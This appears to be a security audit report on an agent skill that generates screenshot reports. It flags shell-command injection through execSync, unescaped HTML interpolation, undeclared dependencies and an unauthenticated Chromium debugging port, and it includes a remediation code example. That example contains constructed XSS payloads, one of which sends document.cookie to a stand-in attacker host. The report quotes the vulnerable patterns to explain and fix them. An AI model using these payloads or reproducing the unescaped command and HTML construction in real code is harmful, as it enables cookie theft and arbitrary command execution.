Business Opportunity Screenshot
Rating: Warn. Audited by ClawScan on May 18, 2026.
Overview
This skill matches its stated screenshot-report purpose, but it builds local shell commands by splicing unescaped input into a command string, so a crafted query could run arbitrary commands on the user's machine with the user's permissions.
Install only if you trust the script and can run it in a controlled workspace. Avoid passing arbitrary or user-supplied query text until the shell-command construction is fixed, and consider reviewing or patching the HTML escaping and Chromium debugging setup before use.
Findings (4)
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
If the agent or user supplies a query containing shell metacharacters, unintended local commands could run with the user’s permissions.
The documented query input is inserted directly into a shell command that is executed with execSync, without quoting, validation, or an argument array.
```javascript
function exec(command, options = {}) { ... return execSync(command, { ... }).trim(); }
...
const result = exec(`clawhub search ${query}`);
```
Replace execSync string commands with execFile/spawn argument arrays, strictly validate query and slug values, and avoid passing untrusted text through the shell.
Malformed or malicious report data could alter the generated page or run browser-side script when the report is opened for screenshotting.
User-controlled output_name and ClawHub-derived skill fields are interpolated into generated HTML that the skill then opens in Chromium, with no visible HTML escaping in the provided code.
```html
<title>${outputName}</title>
...
<span class="skill-name">${s.slug}</span>
...
<p class="skill-desc">${s.summary}</p>
```
HTML-escape all user and provider-supplied values before writing the report, or generate the report using safe text nodes/templates that do not execute embedded markup.
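The raw interpolation quoted above next to an escaped version, as an added example that is not the skill's own code. The `escapeHtml` helper, the render function names and the hostile registry records are constructed for the demonstration.

```javascript
// Added example (not the skill's own code): escaping every value that
// crosses into the report markup before Chromium ever loads the page.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape the five characters that can change HTML structure or break out of
// an attribute. Everything else is left alone, so non-ASCII summaries survive.
function escapeHtml(value) {
  return String(value ?? '').replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable shape from the finding: outputName, slug and summary land in the
// page verbatim, so a summary containing <script> runs when Chromium opens it.
function renderReportUnsafe(outputName, skills) {
  return `<title>${outputName}</title>` +
    skills.map((s) =>
      `<span class="skill-name">${s.slug}</span><p class="skill-desc">${s.summary}</p>`,
    ).join('');
}

// Hardened shape: same template, but every value passes through escapeHtml,
// so provider data can only ever render as text.
function renderReportSafe(outputName, skills) {
  const e = escapeHtml;
  return `<title>${e(outputName)}</title>` +
    skills.map((s) =>
      `<span class="skill-name">${e(s.slug)}</span><p class="skill-desc">${e(s.summary)}</p>`,
    ).join('');
}

// Constructed hostile registry data: a slug that injects an element and a
// summary that closes the page's own tags and exfiltrates cookies.
const SAMPLE_SKILLS = [
  { slug: '<img src=x onerror="alert(1)">', summary: 'Finds "hot" leads & trends' },
  { slug: 'lead-finder', summary: '</p><script>fetch("http://attacker.example/" + document.cookie)</script>' },
];

// True when the rendered markup still contains a tag that came from the input.
function containsRawTag(html) {
  return /<(img|script)\b/i.test(html);
}
```

The `<title>` case matters on its own: a value containing `</title>` ends the title element and everything after it is parsed as markup, which `escapeHtml` prevents by turning the `<` into `&lt;`.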
Users may not realize they must install and trust additional local software before the skill works.
The skill depends on external local tools and an npm package, but the registry requirements list no required binaries or install spec.
````markdown
## Dependencies
- `clawhub` CLI
- `chromium-browser`
- `puppeteer-core` npm package
- WSL2 environment + DISPLAY=:0

## Installing dependencies
```bash
npm install puppeteer-core
```
````
Declare required binaries and npm setup in metadata/install specs, and install from a reviewed lockfile or pinned package version.
While purpose-aligned, an open browser debugging port can expose browser control to local processes while it is running.
The skill intentionally opens Chromium with a local debugging port so Puppeteer can capture a screenshot.
```
chromium-browser --remote-debugging-port=9222 <url>
...
puppeteer.connect({ browserURL: 'http://localhost:9222' })
```
Use a temporary isolated browser profile, bind debugging to localhost only, close Chromium after the screenshot, and avoid running it alongside sensitive browser sessions. The DevTools endpoint performs no authentication, so any local process that can reach the port has full control of that browser, including any profile it was started with.
